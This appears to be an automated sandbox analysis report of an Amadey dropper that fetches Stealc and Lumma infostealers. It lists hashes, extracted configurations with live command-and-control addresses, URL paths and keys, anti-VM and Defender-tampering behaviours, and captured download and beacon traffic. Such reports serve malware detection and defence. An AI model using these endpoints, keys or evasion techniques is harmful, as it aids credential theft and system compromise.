Analysis

  • max time kernel: 142s
  • max time network: 145s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 08/11/2024, 03:04 UTC

General

  • Target: 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
  • Size: 3.1MB
  • MD5: 74ba48529515c95320f4a86fc42fc668
  • SHA1: c33b2b0c5e43e5ac274206ae964cf85bb8718048
  • SHA256: 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa
  • SHA512: 16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8
  • SSDEEP: 98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T

Malware Config

Extracted

  • Family: amadey
  • Version: 4.42
  • Botnet: 9c9aa5
  • C2: http://185.215.113.43
  • Attributes
    • install_dir: abc3bc1985
    • install_file: skotes.exe
    • strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
    • url_paths: /Zu7JuNko/index.php
  • rc4.plain: 006700e5a2ab05704bbb0c589b88924d

Extracted

  • Family: stealc
  • Botnet: tale
  • C2: http://185.215.113.206
  • Attributes
    • url_path: /6c4adf523b719729.php

Extracted

  • Family: lumma
  • C2: https://founpiuer.store/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
    "C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:540
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe
        "C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1296
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1468
          4⤵
          • Program crash
          PID:2896
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1508
          4⤵
          • Program crash
          PID:4572
      • C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe
        "C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3740
      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        3⤵
        PID:4472
      • C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe
        "C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Windows security modification
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4252
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2748
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1296 -ip 1296
    1⤵
    PID:3584
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1296 -ip 1296
    1⤵
    PID:4652
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3296
  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:1660

Network

  • DNS PTR 8.8.8.8.in-addr.arpa via 8.8.8.8:53
    Response: dns.google
  • DNS PTR 8.8.8.8.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 232.168.11.51.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 106.209.201.84.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 106.209.201.84.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 20.160.190.20.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 4
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:04:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Refresh: 0; url = Login.php
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 158
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:04:56 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 31
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:23 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 31
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:31 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 31
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:33 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
  • POST http://185.215.113.43/Zu7JuNko/index.php (skotes.exe, remote 185.215.113.43:80)
    Request:
      POST /Zu7JuNko/index.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 185.215.113.43
      Content-Length: 31
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:41 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
  • DNS PTR 95.221.229.192.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 43.113.215.185.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • GET http://185.215.113.16/luma/random.exe (skotes.exe, remote 185.215.113.16:80)
    Request:
      GET /luma/random.exe HTTP/1.1
      Host: 185.215.113.16
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:00 GMT
      Content-Type: application/octet-stream
      Content-Length: 3152896
      Last-Modified: Fri, 08 Nov 2024 02:43:37 GMT
      Connection: keep-alive
      ETag: "672d7ad9-301c00"
      Accept-Ranges: bytes
  • GET http://185.215.113.16/steam/random.exe (skotes.exe, remote 185.215.113.16:80)
    Request:
      GET /steam/random.exe HTTP/1.1
      Host: 185.215.113.16
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:26 GMT
      Content-Type: application/octet-stream
      Content-Length: 2158592
      Last-Modified: Fri, 08 Nov 2024 02:43:50 GMT
      Connection: keep-alive
      ETag: "672d7ae6-20f000"
      Accept-Ranges: bytes
  • GET http://185.215.113.16/off/random.exe (skotes.exe, remote 185.215.113.16:80)
    Request:
      GET /off/random.exe HTTP/1.1
      Host: 185.215.113.16
    Response:
      HTTP/1.1 200 OK
      Server: nginx/1.18.0 (Ubuntu)
      Date: Fri, 08 Nov 2024 03:05:36 GMT
      Content-Type: application/octet-stream
      Content-Length: 2828800
      Last-Modified: Fri, 08 Nov 2024 02:26:35 GMT
      Connection: keep-alive
      ETag: "672d76db-2b2a00"
      Accept-Ranges: bytes
  • DNS PTR 209.205.72.20.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 16.113.215.185.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 28.118.140.52.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 28.118.140.52.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 28.118.140.52.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 28.118.140.52.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 197.87.175.4.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 241.150.49.20.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 241.150.49.20.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 241.150.49.20.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 241.150.49.20.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS PTR 241.150.49.20.in-addr.arpa via 8.8.8.8:53
    (no response)
  • DNS A presticitpo.store via 8.8.8.8:53 (71b8acff7f.exe)
    Response: (empty)
  • DNS A crisiwarny.store via 8.8.8.8:53 (71b8acff7f.exe)
    Response: (empty)
  • DNS A fadehairucw.store via 8.8.8.8:53 (71b8acff7f.exe)
    Response: (empty)
  • DNS A thumbystriw.store via 8.8.8.8:53 (71b8acff7f.exe)
    Response: (empty)
  • DNS A thumbystriw.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A necklacedmny.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A necklacedmny.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A necklacedmny.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A necklacedmny.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A necklacedmny.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS PTR 18.31.95.13.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • GET http://185.215.113.206/ (e1ae7b97ca.exe, remote 185.215.113.206:80)
    Request:
      GET / HTTP/1.1
      Host: 185.215.113.206
      Connection: Keep-Alive
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 03:05:30 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
  • POST http://185.215.113.206/6c4adf523b719729.php (e1ae7b97ca.exe, remote 185.215.113.206:80)
    Request:
      POST /6c4adf523b719729.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH
      Host: 185.215.113.206
      Content-Length: 211
      Connection: Keep-Alive
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 03:05:30 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 8
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
  • DNS PTR 206.113.215.185.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS A founpiuer.store via 8.8.8.8:53 (71b8acff7f.exe)
    Response: founpiuer.store IN A 104.21.5.155, founpiuer.store IN A 172.67.133.135
  • DNS A founpiuer.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A founpiuer.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS A founpiuer.store via 8.8.8.8:53 (71b8acff7f.exe)
    (no response)
  • DNS PTR 75.117.19.2.in-addr.arpa via 8.8.8.8:53
    Response: a2-19-117-75.deploy.static.akamaitechnologies.com
  • DNS PTR 75.117.19.2.in-addr.arpa via 8.8.8.8:53
    (no response)
  • POST https://founpiuer.store/api (71b8acff7f.exe, remote 104.21.5.155:443)
    Request:
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: founpiuer.store
    Response:
      HTTP/1.1 403 Forbidden
      Date: Fri, 08 Nov 2024 03:05:38 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI%2FPT04%2FWP%2Bocu2N6gxCblweQnhVwYrt23yYjQU%2Frole4AvDddc6%2BdVpJiN5KNu79AbjZc7R1CrcvHBZWiw%2BgFNLyjnEf4veR1f2C6AK13qoKZI%2B%2F6tuMyATA4ACFwUqezI%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8df257b27aebbda0-LHR
  • POST https://founpiuer.store/api (71b8acff7f.exe, remote 104.21.5.155:443)
    Request:
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Cookie: __cf_mw_byp=Hl5sv1NETPETgsrAnXBkc1LI.ccTVaYKai9EgCsvnsg-1731035138-0.0.1.1-/api
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 52
      Host: founpiuer.store
    Response:
      HTTP/1.1 200 OK
      Date: Fri, 08 Nov 2024 03:05:39 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=itv2q58qggv27129205rms8gdp; expires=Mon, 03-Mar-2025 20:52:18 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2s6fLTd07wIRITiCZUTxPBNXZr1%2FWaBZIi5qfgaCuzymsBWFvyL9cwyOHviHYeGbrV8idukv4I2Gg0iKWrL1ifYuV1j9Uo7FTgEJj%2FIHpSzYraiKAngzXEBPEft7COvQ1c%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8df257b32b57bda0-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=49524&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8460&recv_bytes=1065&delivery_rate=188472&cwnd=257&unsent_bytes=0&cid=a817319027210647&ts=383&x=0"
  • DNS PTR 155.5.21.104.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 172.214.232.199.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
  • DNS PTR 14.227.111.52.in-addr.arpa via 8.8.8.8:53
    Response: (empty)
        • 185.215.113.43:80
          http://185.215.113.43/Zu7JuNko/index.php
          http
          skotes.exe
          2.8kB
          3.7kB
          27
          19

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.43/Zu7JuNko/index.php

          HTTP Response

          200
        • 185.215.113.16:80
          http://185.215.113.16/off/random.exe
          http
          skotes.exe
          279.5kB
          8.4MB
          6018
          6010

          HTTP Request

          GET http://185.215.113.16/luma/random.exe

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.16/steam/random.exe

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.16/off/random.exe

          HTTP Response

          200
        • 185.215.113.206:80
          http://185.215.113.206/6c4adf523b719729.php
          http
          e1ae7b97ca.exe
          957 B
          745 B
          10
          8

          HTTP Request

          GET http://185.215.113.206/

          HTTP Response

          200

          HTTP Request

          POST http://185.215.113.206/6c4adf523b719729.php

          HTTP Response

          200
        • 104.21.5.155:443
          https://founpiuer.store/api
          tls, http
          71b8acff7f.exe
          1.7kB
          10.2kB
          15
          17

          HTTP Request

          POST https://founpiuer.store/api

          HTTP Response

          403

          HTTP Request

          POST https://founpiuer.store/api

          HTTP Response

          200
        • 8.8.8.8:53
          8.8.8.8.in-addr.arpa
          dns
          132 B
          90 B
          2
          1

          DNS Request

          8.8.8.8.in-addr.arpa

          DNS Request

          8.8.8.8.in-addr.arpa

        • 8.8.8.8:53
          232.168.11.51.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          232.168.11.51.in-addr.arpa

        • 8.8.8.8:53
          106.209.201.84.in-addr.arpa
          dns
          146 B
          133 B
          2
          1

          DNS Request

          106.209.201.84.in-addr.arpa

          DNS Request

          106.209.201.84.in-addr.arpa

        • 8.8.8.8:53
          20.160.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          20.160.190.20.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          43.113.215.185.in-addr.arpa, dns: 73 B sent, 133 B received, 1 request, 1 response
          DNS Request: 43.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          16.113.215.185.in-addr.arpa, dns: 73 B sent, 133 B received, 1 request, 1 response
          DNS Request: 16.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          209.205.72.20.in-addr.arpa, dns: 72 B sent, 158 B received, 1 request, 1 response
          DNS Request: 209.205.72.20.in-addr.arpa

        • 8.8.8.8:53
          28.118.140.52.in-addr.arpa, dns: 288 B sent, 158 B received, 4 requests, 1 response
          DNS Request (4×): 28.118.140.52.in-addr.arpa

        • 8.8.8.8:53
          197.87.175.4.in-addr.arpa, dns: 71 B sent, 157 B received, 1 request, 1 response
          DNS Request: 197.87.175.4.in-addr.arpa

        • 8.8.8.8:53
          241.150.49.20.in-addr.arpa, dns: 360 B sent, 158 B received, 5 requests, 1 response
          DNS Request (5×): 241.150.49.20.in-addr.arpa

        • 8.8.8.8:53
          presticitpo.store, dns, process 71b8acff7f.exe: 63 B sent, 128 B received, 1 request, 1 response
          DNS Request: presticitpo.store

        • 8.8.8.8:53
          crisiwarny.store, dns, process 71b8acff7f.exe: 62 B sent, 127 B received, 1 request, 1 response
          DNS Request: crisiwarny.store

        • 8.8.8.8:53
          fadehairucw.store, dns, process 71b8acff7f.exe: 63 B sent, 128 B received, 1 request, 1 response
          DNS Request: fadehairucw.store

        • 8.8.8.8:53
          thumbystriw.store, dns, process 71b8acff7f.exe: 126 B sent, 128 B received, 2 requests, 1 response
          DNS Request (2×): thumbystriw.store

        • 8.8.8.8:53
          necklacedmny.store, dns, process 71b8acff7f.exe: 320 B sent, 5 requests
          DNS Request (5×): necklacedmny.store

        • 8.8.8.8:53
          18.31.95.13.in-addr.arpa, dns: 70 B sent, 144 B received, 1 request, 1 response
          DNS Request: 18.31.95.13.in-addr.arpa

        • 8.8.8.8:53
          206.113.215.185.in-addr.arpa, dns: 74 B sent, 134 B received, 1 request, 1 response
          DNS Request: 206.113.215.185.in-addr.arpa

        • 8.8.8.8:53
          founpiuer.store, dns, process 71b8acff7f.exe: 244 B sent, 93 B received, 4 requests, 1 response
          DNS Request (4×): founpiuer.store
          DNS Response: 104.21.5.155, 172.67.133.135

        • 8.8.8.8:53
          75.117.19.2.in-addr.arpa, dns: 140 B sent, 133 B received, 2 requests, 1 response
          DNS Request (2×): 75.117.19.2.in-addr.arpa

        • 8.8.8.8:53
          155.5.21.104.in-addr.arpa, dns: 71 B sent, 133 B received, 1 request, 1 response
          DNS Request: 155.5.21.104.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa, dns: 74 B sent, 128 B received, 1 request, 1 response
          DNS Request: 172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          14.227.111.52.in-addr.arpa, dns: 72 B sent, 158 B received, 1 request, 1 response
          DNS Request: 14.227.111.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe

          Filesize

          3.0MB

          MD5

          dceb05bdd62c6c55ab493ccd4d6ca445

          SHA1

          236ca65f1dbfdc4a06140af7871cd4aa8d2ba1d1

          SHA256

          e293319a6bb1415044af45cf66026b591dc5f72c8e83c39e35af8c5e6579c7e5

          SHA512

          59d9ea396546a2b8ca2de08a791f7954c1286837c6effa24ec858f79af0464c4e20136bdc7d7acb7655e2403e1377fe3615b9d52bc75bc9bb8161007922783c9

        • C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe

          Filesize

          2.1MB

          MD5

          18c1fe0a3db9ac8cf9bae44f3d261a2c

          SHA1

          cd3a1f06db593e00e03a43bf2ba1732897c94721

          SHA256

          d33bf5ccd141c26d9e218fb573b078cdcd54eb890d2a32306a0eea649750aad8

          SHA512

          60f9cc29f296a828828d278512128ceadc90618cc204774539037293c628018c5d1dfb9d5ced3819209c644116a9cf1b4bb0f7b5b680d45aa779c42fb5010735

        • C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe

          Filesize

          2.7MB

          MD5

          0388e2b7bda529ad2e2c828e347c50ff

          SHA1

          1810d53c0c9a63e27bd0d41b1dfd0ad92910e8e0

          SHA256

          52e24f63eb5333c50be7274f75f8bd2672abbebacded171bb597f7a941f80c3a

          SHA512

          d7120812ac04c355cafee1daad4d0599ce181f6f29017ba61654ba22295449e5fb1cadd19b175a6cb57045e3e4832cdb6056f0ae5788bd1534e6bc13275bb84b

        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

          Filesize

          3.1MB

          MD5

          74ba48529515c95320f4a86fc42fc668

          SHA1

          c33b2b0c5e43e5ac274206ae964cf85bb8718048

          SHA256

          766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa

          SHA512

          16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8

        • memory/540-18-0x0000000000210000-0x000000000052C000-memory.dmp

          Filesize

          3.1MB

        • memory/540-4-0x0000000000210000-0x000000000052C000-memory.dmp

          Filesize

          3.1MB

        • memory/540-19-0x0000000000211000-0x0000000000279000-memory.dmp

          Filesize

          416KB

        • memory/540-2-0x0000000000211000-0x0000000000279000-memory.dmp

          Filesize

          416KB

        • memory/540-3-0x0000000000210000-0x000000000052C000-memory.dmp

          Filesize

          3.1MB

        • memory/540-0-0x0000000000210000-0x000000000052C000-memory.dmp

          Filesize

          3.1MB

        • memory/540-1-0x0000000077064000-0x0000000077066000-memory.dmp

          Filesize

          8KB

        • memory/1296-94-0x00000000007F0000-0x0000000000AF5000-memory.dmp

          Filesize

          3.0MB

        • memory/1296-70-0x00000000007F0000-0x0000000000AF5000-memory.dmp

          Filesize

          3.0MB

        • memory/1296-69-0x00000000007F0000-0x0000000000AF5000-memory.dmp

          Filesize

          3.0MB

        • memory/1296-49-0x00000000007F0000-0x0000000000AF5000-memory.dmp

          Filesize

          3.0MB

        • memory/1660-112-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-23-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-24-0x00000000004C1000-0x0000000000529000-memory.dmp

          Filesize

          416KB

        • memory/2628-102-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-106-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-107-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-33-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-34-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-27-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-26-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-51-0x00000000004C0000-0x00000000007DC000-memory.dmp

          Filesize

          3.1MB

